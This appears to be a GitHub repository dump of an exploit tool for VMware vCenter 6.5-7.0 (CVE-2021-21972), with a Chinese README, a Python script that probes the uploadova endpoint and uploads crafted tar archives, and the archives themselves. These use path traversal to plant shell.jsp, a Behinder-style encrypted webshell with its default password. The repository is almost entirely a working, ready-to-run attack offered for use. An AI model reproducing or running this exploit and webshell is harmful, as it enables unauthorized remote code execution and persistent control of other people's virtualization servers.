├── README.md ├── exp ├── Linux.tar └── Windows.tar ├── vcenter_rce.jpg └── vcenter_rce.py /README.md: -------------------------------------------------------------------------------- 1 | # vcenter_rce 2 | 漏洞利用,Vmware vCenter 6.5-7.0 RCE(CVE-2021-21972),上传冰蝎3,getshell 3 | 4 | #Usage: python3 vcenter_rce -u url 5 | ![image](https://github.com/gsheller/vcenter_rce/blob/master/vcenter_rce.jpg) 6 | -------------------------------------------------------------------------------- /exp/Linux.tar: -------------------------------------------------------------------------------- 1 | ../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%> 2 | -------------------------------------------------------------------------------- /exp/Windows.tar: -------------------------------------------------------------------------------- 1 | ././@LongLink0000000000000000000000000000016200000000000011564 Lustar rootroot../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.w0000755000000000000000000000000014015472111031540 5ustar rootroot././@LongLink0000000000000000000000000000017300000000000011566 Lustar rootroot../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/shell.jsp../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.w0000644000000000000000000000117114015471465031555 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%> 2 | -------------------------------------------------------------------------------- /vcenter_rce.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ma1Dong/vcenter_rce/4bb3f4607fe56234aecb15df1c8fd482480eebf5/vcenter_rce.jpg -------------------------------------------------------------------------------- /vcenter_rce.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | #Author:gshell 4 | 5 | import sys 6 | import requests 7 | import os 8 | import urllib3 9 | 10 | auth = """ 11 | ___ _____ __ __ __ 12 | / _ ) __ __ / ___/ ___ / / ___ / / / / 13 | / _ | / // / / (_ / (_-< / _ \/ -_) / / / / 14 | /____/ \_, / \___/ /___//_//_/\__/ /_/ /_/ 15 | /___/ 16 | ==================================================== 17 | """ 18 | 19 | urllib3.disable_warnings() 20 | 21 | WORK_PATH = os.getcwd() 22 | 23 | linux_exp = WORK_PATH + '/exp/Linux.tar' 24 | win_exp = WORK_PATH + '/exp/Windows.tar' 25 | # init vulnerable url and shell URL 26 | vul_url = '/ui/vropspluginui/rest/services/uploadova' 27 | shell_url = '/ui/resources/shell.jsp' 28 | 29 | headers={} 30 | headers['User-Agent']='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0' 31 | 32 | 33 | def checkVul(url): 34 | if url[-1] == '/': 35 | url = url[:-1].split('\n')[0] 36 | else: 37 | url = url.split('\n')[0] 38 | try: 39 | res = requests.get(url+vul_url, verify=False,timeout=5,headers=headers) 40 | if res.status_code == 405: 41 | print('[+] 目标可能存在漏洞:{}'.format(url)) 42 | return True 43 | else: 44 | print('[-] {url} 目标不存在漏洞'.format(url=url)) 45 | return False 46 | except: 47 | print('[-] {url} 目标连接失败'.format(url=url)) 48 | return False 49 | 50 | 51 | 52 | def checkShellExist(url): 53 | res = requests.get(url + shell_url, verify=False,timeout=5,headers=headers) 54 | # print(res.status_code) 55 | if res.status_code != 404: 56 | return True 57 | else: 58 | return False 59 | 60 | def uploadWindowsPayload(url): 61 | if url[-1] == '/': 62 | url = url[:-1].split('\n')[0] 63 | else: 64 | url = url.split('\n')[0] 65 | 66 | print('[+] 测试win_exp') 67 | file = {'uploadFile': open(win_exp, 'rb')} 68 | re = requests.post(url + vul_url, files=file, verify=False,timeout=5,headers=headers) 69 | if 'SUCCESS' in re.text: 70 | if checkShellExist(url): 71 | print('[+] shell地址:: {url}, 冰蝎3,密码:rebeyond'.format(url=url + shell_url)) 72 | else: 73 | print( 74 | '[-] All payload has been upload but not success.' 75 | ) 76 | 77 | def gshell(url): 78 | if url[-1] == '/': 79 | url = url[:-1].split('\n')[0] 80 | else: 81 | url = url.split('\n')[0] 82 | 83 | print('[+] 测试linux_exp') 84 | file = {'uploadFile': open(linux_exp, 'rb')} 85 | # print(url + vul_url) 86 | res = requests.post(url + vul_url, files=file, verify=False,timeout=5,headers=headers) 87 | # print (res.text) 88 | if 'SUCCESS' in res.text: 89 | print('[+] shell成功上传') 90 | if checkShellExist(url): 91 | print( 92 | '[+] shell地址: {url}, 冰蝎3,密码:rebeyond'.format( 93 | url=url + shell_url)) 94 | else: 95 | uploadWindowsPayload(url) 96 | else: 97 | uploadWindowsPayload(url) 98 | 99 | if __name__ == "__main__": 100 | print(auth) 101 | 102 | if len(sys.argv) < 2: 103 | print("usage:python vcenter_rce.py -u website") 104 | else: 105 | url = sys.argv[sys.argv.index("-u")+1] 106 | # jar = sys.argv[sys.argv.index("-u")+3] 107 | if checkVul(url): 108 | gshell(url) 109 | # CVE_2020_17519(url) 110 | # rce(url) 111 | 112 | 113 | # if __name__ == "__main__": 114 | # banner() 115 | # parser = argparse.ArgumentParser() 116 | # parser.add_argument( 117 | # "-url", 118 | # "--targeturl", 119 | # type=str, 120 | # help="Target URL. e.g: -url 192.168.2.1、-url https://192.168.2.1") 121 | # args = parser.parse_args() 122 | # url = args.targeturl 123 | # if 'https://' not in url: 124 | # url = 'https://' + url 125 | # if checkVul(url): 126 | # getshell(url) 127 | # elif checkVul(url): 128 | # getshell(url) 129 | # else: 130 | # parser.print_help() 131 | --------------------------------------------------------------------------------